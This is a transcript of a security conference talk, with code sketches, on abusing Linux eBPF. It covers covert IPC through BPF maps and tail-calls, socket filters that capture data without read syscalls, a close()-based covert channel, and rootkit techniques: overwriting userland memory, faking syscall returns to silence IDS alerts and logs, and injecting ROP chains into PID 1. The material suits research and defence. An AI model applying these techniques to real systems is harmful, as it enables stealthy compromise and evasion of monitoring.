We're going to hear now from Jeff, but first a couple of announcements: no smoking or vaping in this room, of any kind, at any time. If you managed to sneak in outside beverages, shame on you, and if you're going to consume anything you brought in, it needs to be water, and that is all. So, Jeff here came in from New York. He's giving kind of an update on a talk he's given before. He's unfortunately not a first-time speaker, but it's good that he came back and wasn't terrified into never returning. Let's give Jeff a big round of applause.

Hi folks. I'd just like to start by saying that this is a 45-minute condensed snapshot of a 105-minute talk submission, so this is going to get pretty dense. I'm Jeff, I work for NCC Group doing a lot of research and other hacking stuff, and one of the things that brought me to this topic is that I've done a lot of PCAP packet-processing work and also dynamic instrumentation, and this work has tickled both of those for me. We're going to be covering a whole bunch of things. A big part of this talk is setup, and then the rest of it is a bunch of fairly fundamental, primitive techniques that can be used to build up some very nasty things.

So first, eBPF. It is extended BPF, but what is all this BPF nonsense? BPF is the Berkeley Packet Filter. It's a bytecode instruction set and virtual machine that runs in kernel space, ideally to process packets inline. The idea is that when you run tcpdump and give it, say, a port filter, tcpdump doesn't want to process all the packets itself, and it's very expensive to send all of them down to user space just for it to print them out or not. So it sends a little program up to the kernel, and the kernel decides, based on that program, which packets to actually send back down to user space to tcpdump.

eBPF, on the other hand, takes the same general idea but extends that very limited instruction set into something that's basically almost one-to-one with x86, to the point that you can compile C code down to it. It's used for a lot of things: you can still do the packet-processing stuff, but it's also being used for dynamic tracing along the lines of DTrace on other Unix systems. Everything it does is basically done through the bpf(2) syscall. The two main things you do with it are load programs and create maps: the programs are the code, and the maps are internal data structures that let you share data between the code that runs in the kernel and the code you have running in user space.

eBPF's instruction set architecture is super featureful, and because of that there's a whole bunch of verification done in the kernel to make sure it doesn't crash or hang the kernel. I'm not really going to talk about that much here; I covered it in my previous talk. We're just going to go straight into doing stuff with eBPF and simply hope that the code works in the first place and doesn't get rejected.
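As a concrete illustration of the classic-BPF idea above (tcpdump handing the kernel a tiny filter program for a socket), here is a minimal sketch. The filter logic is deliberately trivial, just "accept every packet"; a real tcpdump filter would be a longer program compiled from an expression like "tcp port 80".

```c
/* Minimal classic-BPF sketch: attach a tiny "accept everything" filter
 * program to a socket with SO_ATTACH_FILTER, the mechanism tcpdump uses.
 * Error handling is mostly omitted; this is illustrative only. */
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <linux/filter.h>

int main(void) {
    int sock = socket(AF_INET, SOCK_DGRAM, 0);
    if (sock < 0) { perror("socket"); return 1; }

    struct sock_filter insns[] = {
        /* return 0xFFFF: accept the packet (keep up to 65535 bytes) */
        BPF_STMT(BPF_RET | BPF_K, 0xFFFF),
    };
    struct sock_fprog prog = {
        .len    = sizeof(insns) / sizeof(insns[0]),
        .filter = insns,
    };

    /* This is the "send a little program to the kernel" step. */
    if (setsockopt(sock, SOL_SOCKET, SO_ATTACH_FILTER, &prog, sizeof(prog)) < 0)
        perror("setsockopt(SO_ATTACH_FILTER)");
    return 0;
}
```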
So the general idea is that you create one of these eBPF programs, you create some maps, you hook them together, and ideally they run. All of these things are file descriptors on the userland side. You attach the programs to various facets of the system using very specific APIs, and then they get called inline to process events when they happen.

Most of the interesting eBPF stuff requires CAP_SYS_ADMIN, the sort of god privilege of root that really makes root root. But you can still do stuff without it, specifically socket filters; there are other program types, but they require other privileges to actually use. The main useful thing you do within this restricted runtime is call helper functions, which are essentially APIs into the kernel that do the heavy lifting you otherwise can't do in your little restricted environment. The code is verified, both for things like loops and also to make sure the arguments you pass to those helper functions aren't going to crash the kernel or corrupt memory inside the kernel.

So why eBPF? Why am I doing all this? It has a lot of interesting APIs and things to play around with. It was created for high-performance packet processing, and now it's being applied to anything and everything in the kernel, because programmatic logic is the best logic. It really only has two privilege modes with no in-between right now; there is work on that, but it's not really done and it only scratches the surface. So when you're running your eBPF code, it's either running super unprivileged or it has all of the privileges, and there isn't anything between. That makes it really hard to sandbox, to the point that if you're actually using this in, say, a container, you have to turn off all the security just to use it properly, and that leaves you a very vulnerable target.

So why evil eBPF? Because there are a lot of fun things we can do with these fancy new APIs that the people who made them were not really thinking of, because they were trying to move real fast. What is this talk about? Shenanigans. By that I mean things like obfuscated communication channels between processes that are really hard for someone on the system to track unless they're using very similar technologies to follow them. And rootkits. Lots of rootkits.

We're going to start with a bit of tooling, what we need to get all of this stuff up and running, and then we're going to jump straight into the meat of it. If we want to build all this and get eBPF code running, we have to have a toolchain: a way to compile code into eBPF and actually get it loaded into the kernel. We have to set up comms between the kernel, the eBPF code, and the user-space code. And we're also worrying about portability across systems, because if we're building this thing to target and run on a system that is not our own, we can't necessarily assume it's going to be amenable to us running our code on it.
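To make the "restricted C plus helper functions" idea concrete, here is a minimal kernel-side socket filter sketch that calls a helper to bump a counter in a map. It follows the kernel-samples / xdp-tutorial conventions (SEC() annotations, struct bpf_map_def, a local bpf_helpers.h); header names and section conventions vary between toolchain versions, and the program and map names here are mine.

```c
/* Kernel-side eBPF socket filter sketch: call the bpf_map_lookup_elem
 * helper to find a counter slot and increment it for every packet seen.
 * Assumes samples-style headers (bpf_helpers.h) from the build setup
 * described later in the talk. */
#include <linux/bpf.h>
#include "bpf_helpers.h"

struct bpf_map_def SEC("maps") pkt_count = {
    .type        = BPF_MAP_TYPE_ARRAY,
    .key_size    = sizeof(__u32),
    .value_size  = sizeof(__u64),
    .max_entries = 1,
};

SEC("socket")
int count_packets(struct __sk_buff *skb)
{
    __u32 key = 0;
    /* Helper call into the kernel: look up our counter slot. */
    __u64 *count = bpf_map_lookup_elem(&pkt_count, &key);
    if (count)
        __sync_fetch_and_add(count, 1);

    return -1;  /* accept the packet: return value is bytes to keep */
}

char _license[] SEC("license") = "GPL";
```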
We want to keep things very lightweight and small. As with many things in Linux, there are a lot of choices to shoot your various digits off with, so you have to pick a way you're going to do all this eBPF stuff. Heads up: I went with the LLVM/Clang approach, but I think it's important to cover all of them, what they're good at and what they're not.

At a high level, you can write raw eBPF instructions by hand using a C-macro domain-specific language. It's often used for very simple examples; it's hard to build bigger stuff with it. You can use the LLVM toolchain to compile C code into ELF binaries for the eBPF architecture. There's a lot of infrastructure for that built into the Linux kernel tree, but its build infrastructure is a little slow, so there are also toolchains to do it out of the Linux tree, though then you have to manage all your headers yourself. And then, at a higher level, there are things like BCC and gobpf, which essentially instrument your C code, providing a variant of C that allows easier auto-registering of things, and then the rest of the code you interact with from either Python or Go on the userland side.

After that, just to interact with the eBPF APIs, there are raw syscalls, because libcs don't actually ship wrapper stubs to call these things. Then there's libbpf, which is maintained in the kernel tree, basically solves that problem, and provides a couple of other nifty things. And there's this magic bpf_load.c, which I'll get to in a bit.

Raw BPF is very unsanitary. I wouldn't really recommend it for building anything complicated, but you will be able to generate BPF code that the LLVM toolchain isn't going to build and that the kernel may not be expecting, because it may be expecting the sorts of things the LLVM toolchain builds and not stuff you cobbled together by hand. I'll leave you with that.

The LLVM stuff is pretty simple, assuming you've got a basic toolchain that can build it for you. I've got a lot of code snippets, and I'm not necessarily going to walk through all of them; they're more for reference, so don't feel like you have to read and understand every line of code that appears in this talk. I've avoided using the Linux kernel's own build infrastructure because it's really slow and I like to make small changes and rebuild quickly. So I've been using the xdp-project xdp-tutorial repo, from what appears to be Facebook developers who've been doing packet-processing work. I'm not using it for packet processing all that much, but it works, and it's a very hackable build system.

Once you actually have your binary, you need to load it. An interesting thing about how this works is that to reference those maps, you have to take the instructions and inline the map file descriptors into them. So you actually have to create the maps first, shunt their file descriptors into the bytecode, and then load that into the kernel. libbpf and bpf_load do a lot of magic to pull the code out of sections of the ELF binary and pass it up to the kernel.
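Here is a hedged userland loader sketch showing that "libbpf does the map-fd relocation magic" flow. It assumes a reasonably recent libbpf; "filter.o" and "count_packets" are placeholder names for an object built with something like `clang -O2 -target bpf -c filter.c -o filter.o`.

```c
/* Userland loader sketch using libbpf, which creates the maps, patches
 * their fds into the instructions, and loads the programs from the ELF
 * object. Object and program names are placeholders. */
#include <stdio.h>
#include <bpf/libbpf.h>

int main(void) {
    struct bpf_object *obj = bpf_object__open_file("filter.o", NULL);
    if (libbpf_get_error(obj)) { fprintf(stderr, "open failed\n"); return 1; }

    /* Map creation, fd relocation, and program loading all happen here. */
    if (bpf_object__load(obj)) { fprintf(stderr, "load failed\n"); return 1; }

    struct bpf_program *prog =
        bpf_object__find_program_by_name(obj, "count_packets");
    int prog_fd = prog ? bpf_program__fd(prog) : -1;
    printf("program fd: %d\n", prog_fd);

    /* prog_fd can now be attached, e.g. via setsockopt(SO_ATTACH_BPF). */
    return 0;
}
```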
Then there are the high-level APIs. They're really useful for things like tracing; they make a lot of stuff very easy and take care of a lot of heavy lifting, but they also do a lot of magic, and it can be hard to figure out what's going on at the deeper layers. They also require a fairly extended runtime presence, with access to headers and their own libraries, doing things dynamically. You basically have to get the whole framework onto the system to use it in the first place.

So I went with the LLVM/Clang approach. By modifying the Makefiles of that xdp-tutorial repo, I've been able to make statically linked binaries that also statically embed the eBPF ELF file, and I've been using the memfd syscall APIs to expose that buffer as a file path, because those libraries want to load from a file path and not straight from a buffer. BCC and gobpf can't really reasonably do this kind of thing; I just want to drop the one binary, not an extended everything. But BCC is really useful for getting started with a lot of this, and it's useful for kernel tracing, though it doesn't support all the kernel tracing APIs I'll be talking about today.

So let's talk a little about doing bad things with IPC, and by that I mean obscuring communications, leading people astray, sending data without sending it, and reading data without reading it. To talk a little more about the maps: the maps are what you use to share data between your programs in the kernel and the userland code. But it turns out you don't actually need to attach them to a BPF program to use them; you can just make the calls from userland to store data off-process. The maps are just file descriptors, and you make a special syscall to interact with them. Because they're file descriptors, we can pass them between processes using things like Unix domain sockets, or Binder if you're on Android and have access to it. This allows a very interesting form of IPC: we send the file descriptors across, the other process writes into the map, and the original process reads from it, or vice versa.

You can basically just spread a couple of indices in your map across the processes. In this case we have two slots in the map, each 256 bytes, indexed by a regular unsigned integer. You associate each one with a particular process as writer and reader, sender and receiver. You write to a slot using bpf_map_update_elem and read it back out using bpf_map_lookup_elem, and both of those are just wrappers around the same bpf(2) syscall with different subcommands.
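Here is a minimal sketch of that two-slot map-as-IPC idea using the raw bpf(2) syscall, since libc ships no wrapper. The slot assignment (slot 0 for one side, slot 1 for the other) and all names are illustrative; in the real scheme the map fd would be handed to the peer process over a Unix domain socket rather than used locally.

```c
/* Sketch: create an array map with two 256-byte slots, write into one
 * slot, and read it back out, all via the raw bpf(2) syscall. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/bpf.h>

static long bpf(int cmd, union bpf_attr *attr) {
    return syscall(__NR_bpf, cmd, attr, sizeof(*attr));
}

int main(void) {
    union bpf_attr attr;

    memset(&attr, 0, sizeof(attr));
    attr.map_type    = BPF_MAP_TYPE_ARRAY;
    attr.key_size    = sizeof(__u32);
    attr.value_size  = 256;          /* value size is fixed by the kernel */
    attr.max_entries = 2;            /* one slot per direction */
    int map_fd = bpf(BPF_MAP_CREATE, &attr);
    if (map_fd < 0) { perror("BPF_MAP_CREATE"); return 1; }

    __u32 key = 0;
    char buf[256] = "hello world";   /* buffer must span the full 256 bytes */

    memset(&attr, 0, sizeof(attr));
    attr.map_fd = map_fd;
    attr.key    = (__u64)(unsigned long)&key;
    attr.value  = (__u64)(unsigned long)buf;
    attr.flags  = BPF_ANY;
    if (bpf(BPF_MAP_UPDATE_ELEM, &attr) < 0) perror("update");

    char out[256] = {0};             /* must also hold 256 bytes, or we get clobbered */
    memset(&attr, 0, sizeof(attr));
    attr.map_fd = map_fd;
    attr.key    = (__u64)(unsigned long)&key;
    attr.value  = (__u64)(unsigned long)out;
    if (bpf(BPF_MAP_LOOKUP_ELEM, &attr) < 0) perror("lookup");

    printf("slot 0: %s\n", out);
    return 0;
}
```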
A word of warning, though: everything about these maps is managed by the kernel, including the sizes of their values. So if you're blindly receiving these file descriptors from untrusted processes, you can very easily run into problems. If we go back to this example, you'll note that the bpf_map_update_elem call doesn't actually pass a size, but we've made sure the buffer is 256 bytes even though we've only put "hello world" in it, which is only a handful of bytes. The reason is that the kernel knows the entry is 256 bytes, so it's going to read those 256 bytes from whatever pointer you give it, and if that buffer isn't big enough, it's going to start reading the values after it. And vice versa: when you're pulling data out, if your buffer isn't big enough to hold the maximum value size, it's just going to clobber whatever comes after the buffer. But there's a way to deal with this. BPF is very reflective: you can query the kernel for all sorts of metadata about the programs and maps, including the size of these things, so you can just dynamically allocate the amount of space you need.

The programs are a little bit interesting because they're really just single functions, and every separate function is actually treated as a separate program. Generally you call a bunch of static inline functions, so they just get bundled into the one program. It turns out you can actually have multiple programs in the same execution context: you make a special BPF map called a program array, you fill it with program file descriptors from user space, and then on the kernel side you call this bpf_tail_call helper, which essentially jumps the context over and never returns. If there's a file descriptor for a program in the map at the index you're trying to call, it just jumps to it and never comes back; if there isn't, the call falls through and execution keeps going.

The interesting thing is that these program array maps can be updated dynamically at runtime, so you can keep updating it, and each tail call will invoke whatever new function is there whenever it sees it. What this means is that we can pass some maps over to another process, have them dynamically fill in their own programs that take spots in that program array, and then every time the event happens, such as a packet being received, it will call their code, which can then send a message back to us.

The idea here is that you actually need to send two map file descriptors: the program array they're going to write into, and the data map their program is going to write to, because the BPF side doesn't have a global awareness of your file descriptors. Each program is associated with its own maps; they can only reach each other through the arrays. So in this case we have a very simple program, and all it does is call bpf_tail_call. We send the file descriptors over to the other process. In our own process, we just set up something like a TCP socket server, and we keep sending packets to ourselves so that at regular intervals we trigger the functionality to run in the kernel, and then we pull the data out of the map afterwards.
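Here is a kernel-side sketch of that dispatcher program: a socket filter whose only job is to tail-call into slot 0 of a program array. If another process has pushed a program fd into that slot, execution jumps there and never returns; otherwise we fall through to the fallback behavior. Samples-style headers and section names are assumed, and all names are mine.

```c
/* Dispatcher sketch: tail-call whatever program currently sits in
 * slot 0 of the program array; fall through when the slot is empty. */
#include <linux/bpf.h>
#include "bpf_helpers.h"

struct bpf_map_def SEC("maps") prog_array = {
    .type        = BPF_MAP_TYPE_PROG_ARRAY,
    .key_size    = sizeof(__u32),
    .value_size  = sizeof(__u32),   /* values are program fds */
    .max_entries = 4,
};

SEC("socket")
int dispatcher(struct __sk_buff *skb)
{
    /* Jump to slot 0 if it is populated; this never returns on success. */
    bpf_tail_call(skb, &prog_array, 0);

    /* Only reached when slot 0 is empty: fallback behavior goes here
     * (in the demo this is the "waiting" path). */
    return -1;
}

char _license[] SEC("license") = "GPL";
```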
The reason we need the two file descriptors is that in the code the writer will be dynamically updating, you'll be defining your own map, and generally the way the libraries work is that they'll just create a map for it. You actually don't want to use that map: you have to go through that code after the fact, iterate over it, and shunt in the actual map you want to be writing to, which you got over the Unix domain socket or Binder or whatever, and then load that program. Then you use bpf_map_update_elem to shunt the program's file descriptor into the program array.

As a demo of this, we have a couple of things going on that I'll briefly explain. On the right side we have the code that does the updating and the iteration: it iterates through the instructions, and every time there's one that would reference a map file descriptor, it patches in the map file descriptor that was received; at the end it loads the program and then updates the program array entry. In the middle we have the actual code that's going to be dynamically injected; it just prints out "DEF CON 27". On the left we have the original programs, the main entry point and a fallback implementation that prints "waiting" until it gets overwritten. In this example we start the thing up, the first couple of times it prints that "waiting" message, and then it's been updated dynamically after the fact.

This essentially lets us do a bunch of very dynamic updates so we can sneak data into places people aren't going to be looking. You could do all sorts of other stuff: you could have data being sent over the socket that is then transformed in-kernel and written out as the real message to the BPF buffer, so if someone's just looking at what's going over the socket, that's not actually the data the application is really operating on.

To talk a little more about socket filters: they're really special, because they're the only ones you can use freely from unprivileged processes. I say unprivileged; Docker actually blocks the bpf(2) syscall unless you're running with CAP_SYS_ADMIN, for whatever reason. But in general this is an unprivileged call and doesn't require anything. It's also, as it turns out, super poorly documented. Privileged processes can create raw IP sockets; that's what ping does to send those INET packets raw. But without privileges you can create normal TCP and UDP sockets, and Unix domain sockets, either stream or datagram. When you attach a socket filter program, either eBPF or classic BPF, different things happen: for raw sockets, the program sees packets from the beginning of the Ethernet frame; for the regular IP-based ones like TCP and UDP, it sees them from the start of the transport header, the TCP or UDP header; and for Unix sockets, the start of the buffer is just the data payload itself.
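For reference, here is a hedged userland sketch of attaching an already loaded eBPF socket-filter program to an ordinary, unprivileged TCP socket. The prog_fd is assumed to come from loading a program as sketched earlier; the fallback #define is only there in case older libc headers don't expose the constant.

```c
/* Attach an eBPF socket filter program (by fd) to a plain TCP socket.
 * No privileges are needed for this socket type; raw sockets would be
 * a different story. */
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>

#ifndef SO_ATTACH_BPF
#define SO_ATTACH_BPF 50   /* value from the uapi socket headers */
#endif

int attach_filter(int prog_fd) {
    int sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) { perror("socket"); return -1; }

    /* From here on, the program runs on every packet this socket receives,
     * whether or not the process ever calls read()/recv() on it. */
    if (setsockopt(sock, SOL_SOCKET, SO_ATTACH_BPF,
                   &prog_fd, sizeof(prog_fd)) < 0) {
        perror("setsockopt(SO_ATTACH_BPF)");
        return -1;
    }
    return sock;
}
```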
Additionally, while these socket filters can't modify the packets directly, they can drop them, which would just completely break TCP, and they can also truncate them. That can cause very interesting things. You could potentially build a very complicated setup that might fool Wireshark: say you drop a packet that contains the real message, and then, with a modified TCP stack on a remote host you fully control, you send another magic packet that will actually be accepted. When someone tries to reassemble the stream in Wireshark, they see something different from what your application actually processed, because Wireshark was reading from the packets and not from the socket.

This leads to an interesting attack in general: you can also read without reading. You don't actually have to call read or any receive syscall on the socket, because these programs get called every time a packet is received, not when the userland process tries to read from the socket. So if you set up a socket server and never actually receive on it, you can have someone send you data, and if someone is trying to look at your data not through tcpdump but through something like strace, they won't see the data, because strace doesn't actually print out the strings passed over the bpf(2) syscall for map reads and writes; they'll just see a random pointer and won't know what's going on.

It's fairly simple to do this: you register your socket filter, and every time a packet comes in you write it into the map, which gets read out every so often by the userland process, which never calls read. You can also do this in the reverse direction: you can write to things and then block the data from actually going out, so it won't send packets, but every write gets shunted into memory in the kernel, and then, if you've chained this with the map communication, you can leak the data back out to another map file descriptor every time write is hit, and anyone on that computer will be none the wiser. You can also use these techniques with other BPF program types that can actually write to the packets, so they might hide data in a packet and then take it back out, such that everything looks normal at the userland level but what actually goes over the network, or doesn't, is some secret data that's hard to see. But those require privileges, and you can do all sorts of other crazy stuff with them too.

As a demo of this, I have a piece of code here that runs a regular TCP socket server and never calls read, recv, recvfrom, or recvmsg, any of the standard syscalls for reading data from a socket, and on the right side I just echo into telnet to the service. I'm running strace on it to prove that none of these syscalls are being issued, so if someone were looking for them they just would not see anything happen. And yet we get the data: the 41, 42, 43 is just hex for capital A, B, C and so on. The signal stuff at the top is just how I'm polling the eBPF buffer; I have a signal handler that polls it about once a second.
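Here is a kernel-side sketch of the filter half of that demo: a socket filter that copies the first bytes of every incoming segment into a map slot, which the userland process polls with bpf_map_lookup_elem without ever calling read() or recv(). Offsets, sizes, and names are illustrative; real code would parse the actual TCP header length instead of assuming a minimal header.

```c
/* "Read without reading" sketch: skim the start of each packet's payload
 * into a map for out-of-band pickup by userland. Samples-style headers
 * assumed. */
#include <linux/bpf.h>
#include "bpf_helpers.h"

#define CHUNK 64

struct bpf_map_def SEC("maps") leak_buf = {
    .type        = BPF_MAP_TYPE_ARRAY,
    .key_size    = sizeof(__u32),
    .value_size  = CHUNK,
    .max_entries = 1,
};

SEC("socket")
int skim_payload(struct __sk_buff *skb)
{
    char chunk[CHUNK] = {0};
    __u32 key = 0;

    /* For TCP/UDP sockets the filter sees data from the start of the
     * transport header; offset 20 assumes a minimal TCP header. */
    bpf_skb_load_bytes(skb, 20, chunk, sizeof(chunk));
    bpf_map_update_elem(&leak_buf, &key, chunk, BPF_ANY);

    return -1;  /* keep the packet so the TCP stack stays happy */
}

char _license[] SEC("license") = "GPL";
```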
So, if you look at this, I have not issued any of these standard reading syscalls on the socket, and yet I have somehow obtained the data that was sent to it. You can build all sorts of stuff on top of this to hide data from people, depending on how they're trying to look at what you're doing.

Let's talk a little about kernel tracing. eBPF supports a whole bunch of modes for dynamic instrumentation of kernel functionality so you can see the data flowing through. This is very privileged, and it can be used to compromise systems, as it turns out; these programs can read arbitrary kernel memory and user-space memory. That presents an interesting opportunity for covert IPC on a system we've already compromised. We can just read data out of processes that they were never going to send to the kernel; they never attempted to send it there, it was just sitting in memory, and they're not issuing any syscalls. We can also have them issue bad syscalls that are going to get rejected, where the data never actually makes it through the kernel. So if they call send on a bad file descriptor, it's not going to result in a packet, and tcpdump isn't going to see it. But we can.

I like to do this mind-reading trick with close, because close is kind of a magic syscall: it takes a file descriptor and that's it. File descriptors have to be non-negative integers, so any time close receives a negative integer it just rejects it and does nothing, and it's essentially idempotent. So what you can do is hook close and wait for certain magic negative file descriptors to start a stateful handshake with a particular process, and after that just start unmarshalling data out of these negative file descriptors to communicate with yourself, basically. If someone's looking at this, they probably don't really look at close; if they see it, they might think something's wrong, but are they really going to attempt to figure out what's going on? Maybe, maybe not.

That's a neat trick, but this stuff can also just absolutely corrupt memory. There's this special bpf_probe_write_user helper function, which I talked about in my previous talk, and this is the thing that gives us rootkit capability. When you use it, it raises an event that goes out on dmesg, but it's so useful. You can also abort syscalls at entry: syscalls, and a couple of other special functions in the kernel, have a special macro that denotes that they can be aborted, and this bpf_override_return helper lets you bail out of actually executing the syscall, so the kernel just doesn't do it, and you can also give an arbitrary return value.

So we need to write things that are useful. Most of the interesting data in syscalls are pointers to userland memory, so we can potentially overwrite strings and other structs that are being sent to the kernel, or written back by the kernel, and we can also just prevent syscalls from reaching the kernel at all.
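Circling back to the close() mind-reading trick for a moment, here is a minimal sketch of the userland sender side. The encoding (a magic high word plus one payload byte per call) is invented purely for illustration; every call is rejected with EBADF and nothing visible happens, which is exactly the point.

```c
/* Userland half of a close()-based covert channel: issue close() on magic
 * negative "file descriptors" that a malicious kprobe on close can decode.
 * The kernel rejects every call and does nothing else. */
#include <string.h>
#include <unistd.h>

#define MAGIC 0x7EF00000  /* arbitrary marker; negated below so it is never a valid fd */

static void covert_send(const char *msg) {
    /* Handshake marker: tell the hooked close() a message is coming. */
    close(-(MAGIC | 0xFFFF));

    for (size_t i = 0; msg[i] != '\0'; i++) {
        /* One byte per call, tucked into the low bits of a negative fd. */
        close(-(MAGIC | (unsigned char)msg[i]));
    }

    /* End-of-message marker. */
    close(-(MAGIC | 0xFFFE));
}

int main(void) {
    covert_send("hello from nowhere");
    return 0;
}
```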
There are a couple of high-level variants of this attack, this way of building a rootkit. You can redirect syscalls: you can make opens for, say, a shell script open a path that is something you control somewhere else, so it just opens and reads your code. You can modify them: every time they read, you could send bad data back and just lie, stomping over the data with your own after the kernel has written it. You can also fake the return entirely by aborting the call and writing the data yourself. And you can also just completely black-hole the data so they can't communicate with the outside world at all.

In the first variant, we're modifying the data that's being sent to the kernel. Generally speaking, the way this works is that you set a tracing hook: a kprobe fires on the syscall entry, and a kretprobe gets called on the syscall return, after the kernel has processed it. When you're hooking these syscalls, all the calls across the entire system go through them, regardless of container; they're all sharing the one kernel and all using the same syscalls. So you potentially have a lot of throughput going through there, and if you're going to mess around with this, you want to be very careful not to crash things. You want to filter through and determine whether the particular process that's calling in, and its particular inputs, are stuff you actually want to mess with; otherwise you might just crash the system accidentally.

When you do this, you could just override the data and be done with it, but if you want to be sneakier, you want to persist the stack data, or whatever data it was that the userland process sent up, so that on the return, after the syscall has finished processing but before context returns to user space, you can write their original data back. That way, if they checked it after the fact, it would look clean, like nothing happened. The way you want to key this is by process ID and thread group ID, and maybe a file descriptor as well if you're keeping track of one, because all of this is essentially stateless other than the data you maintain in your BPF maps. You can't maintain context without using those maps, and the only anchor point you have for context is this very basic information about the process and the kernel thread it's using. But that's good enough, as it turns out.

The opposite approach, where you're just modifying the data, is basically exactly the same, word for word, except that you do your filtering to decide whether to act at the entry point, because the entry point is the one that actually receives the arguments. At the end, you can either have persisted the arguments and then decide whether to do something, or you could have just decided at the beginning. But it's at the end, after the syscall has been processed, that you need to write the data, because otherwise if you overwrite their stuff, the kernel is just going to overwrite you again and nothing will happen. Other than that, it's the same exact approach.
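Here is a kernel-side sketch of that entry/return state-keeping pattern: on syscall entry, remember something (keyed by pid and tgid) in a hash map; on return, look it back up, act on it, and delete it. The probe symbol names vary by kernel version and architecture (and newer kernels wrap syscall arguments), so treat the SEC() names and the elided argument extraction as placeholders.

```c
/* Entry/return state persistence sketch, keyed on pid_tgid. */
#include <linux/bpf.h>
#include <linux/ptrace.h>
#include "bpf_helpers.h"

struct saved_state {
    __u64 user_buf;     /* userland pointer captured at entry */
    __u64 len;
};

struct bpf_map_def SEC("maps") inflight = {
    .type        = BPF_MAP_TYPE_HASH,
    .key_size    = sizeof(__u64),           /* pid_tgid */
    .value_size  = sizeof(struct saved_state),
    .max_entries = 1024,
};

SEC("kprobe/sys_read")
int on_enter(struct pt_regs *ctx)
{
    __u64 id = bpf_get_current_pid_tgid();

    /* Filtering (comm/pid checks) and argument extraction would go here;
     * arg extraction is elided because it differs across kernel versions. */
    struct saved_state st = { .user_buf = 0, .len = 0 };
    bpf_map_update_elem(&inflight, &id, &st, BPF_ANY);
    return 0;
}

SEC("kretprobe/sys_read")
int on_return(struct pt_regs *ctx)
{
    __u64 id = bpf_get_current_pid_tgid();
    struct saved_state *st = bpf_map_lookup_elem(&inflight, &id);
    if (!st)
        return 0;   /* we decided not to touch this call at entry */

    /* The kernel has filled the user buffer by now; this is where
     * bpf_probe_write_user() would stomp over it, or restore it. */
    bpf_map_delete_elem(&inflight, &id);
    return 0;
}

char _license[] SEC("license") = "GPL";
```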
Black-holing everything is fun, because you can block the syscalls, but you can do so much more than that: you can just pretend to be the kernel, essentially, and write in arbitrary data as if the calls had succeeded. So they think they're communicating out, they think they've alerted the IDS or whatever it is that something bad is going on, they think they're writing out to their logstash or whatever. It hasn't happened. It's not happening. They think it's happened; it isn't. That's really useful if you're trying to reverse something and don't want to let it communicate out, whereas if you're attempting to use seccomp to deny stuff, it's going to know it got rejected and it's going to be able to act accordingly.

There's one other limitation to this probe-write-user call: you can't write to non-writable pages. So we can't just clobber the text section with shellcode, unfortunately, at least for properly compiled programs; if they've got bad protections on their sections, or they JIT stuff a lot, things change, but we can't assume that for all processes. This limits us to what's in the stack, the heap, and other writable sections: things like function pointers, saved file descriptors, maybe scripts or shell commands they generate dynamically that we could write into. But we can't guarantee those things are there. The only thing we can really guarantee exists, at a high level, is that they have return addresses. Mostly.

So I put together a fairly concrete way of writing ROP payloads into userland processes from eBPF kernel tracing, and this is the kind of thing you can do for real rootkits to get into, say, PID 1, which is what I did in my previous talk. But to really cover the whole thing, there's a lot to do. You can start with one of two ways of looking at it. You can say you want one payload that you can indiscriminately inject into all processes; for that, you need it to work against something they're all going to load, like a shared library, like their libc. glibc is a great target for this because it's got all sorts of wacky functionality built into it, like a dlopen implementation, which lets you dynamically load a shared library from a file path, and the moment a shared library is loaded, that gives you arbitrary code execution right then and there. So all you have to do is scan for some gadgets, put it together, and boom, you have code execution if you can get your ROP chain to actually load into a process. Very reliable. glibc has every gadget you could ever want to make this work, across every version of the binary I've looked at, across multiple different distros.

Then you want to build your ROP payload. But maybe you're not going to be pre-generating it like this. Maybe you're dealing with a statically linked binary, maybe you're dealing with one that does code generation, and where you're getting called from isn't necessarily something you can easily reason about. So I'll talk a little about dynamic generation of ROP gadgets and payloads.
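Before that, one more sketch tied to the black-holing idea at the top of this section: aborting a syscall at entry with bpf_override_return and handing back a fake success value. This assumes a kernel built with the override/error-injection support the talk mentions; the probe name, pid filter, and fake return value are all placeholders.

```c
/* Black-hole sketch: skip the real syscall and pretend it succeeded. */
#include <linux/bpf.h>
#include <linux/ptrace.h>
#include "bpf_helpers.h"

#define TARGET_TGID 1234   /* hypothetical: only lie to this one process */

SEC("kprobe/sys_sendto")
int blackhole_sendto(struct pt_regs *ctx)
{
    __u32 tgid = bpf_get_current_pid_tgid() >> 32;
    if (tgid != TARGET_TGID)
        return 0;                        /* leave everyone else alone */

    /* Skip the real syscall entirely and pretend 512 bytes went out.
     * A sneakier version would echo back the length the caller passed. */
    bpf_override_return(ctx, 512);
    return 0;
}

char _license[] SEC("license") = "GPL";
```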
When we do this eBPF stuff, we need to pick some syscalls that ideally our target process will be calling, and we're going to register some kprobes and kretprobes on them, just so we can get a userland context: pointers into their userland memory, and also the right processing context to write data back to them. Then, within the code, much like before, we need to sift through and see that the particular calls are actually coming from processes we want. The only process you can very easily detect is PID 1, because it's PID 1 across the entire system regardless of containers and namespacing; the real PID 1 is always PID 1 for real, so it's a very easy target. Other than that, if you want to know that a specific process is doing something, and you're going to change the world view of that process and not target others, you need to watch what it's doing and build up some state about it, so you know it's actually the one you want to hook.

There are two step threes here on purpose. The first is for when you're injecting a pre-generated ROP payload, and the second is for when you're going to dynamically generate it on the fly. In the former, your kprobes, when they get called, actually receive all of the userland registers as they were when the syscall was made to trap up to the kernel. So we can just pull out the instruction pointer, and since the call was probably made from somewhere in libc, we know exactly the offset from the start of libc just from the address of the syscall instruction, and then we know exactly where we are.

On the other side, depending on how ridiculous the binary you're dealing with is, you could do the same thing, but the instructions at the point where it's executing may not be all that useful; they may be in the heap somewhere, where there isn't a whole bunch of known code, just a bunch of JITed code. So you probably want to scan through the stack. To do that, you look at valid stack offsets from where the stack pointer register was, and then you essentially want to look back and see whether the instruction before the would-be return address was the one that issued the call. In x86, when you make a call instruction, the address of the next instruction gets pushed onto the stack, so what you return into is the next instruction; we need the previous instruction, the one that actually issued the call. We can try to detect what that instruction was, and if it was a call and it actually looks like it went to where we are, then everything's good. But it may actually have been a PLT entry; those are the entries for dynamically linked functions, like your libc functions. For those, the call goes to a jump, and the jump goes to where the code that was formerly executing before the syscall lives. So you need to parse those instructions a little to work out the offsets, and then you know where you are.
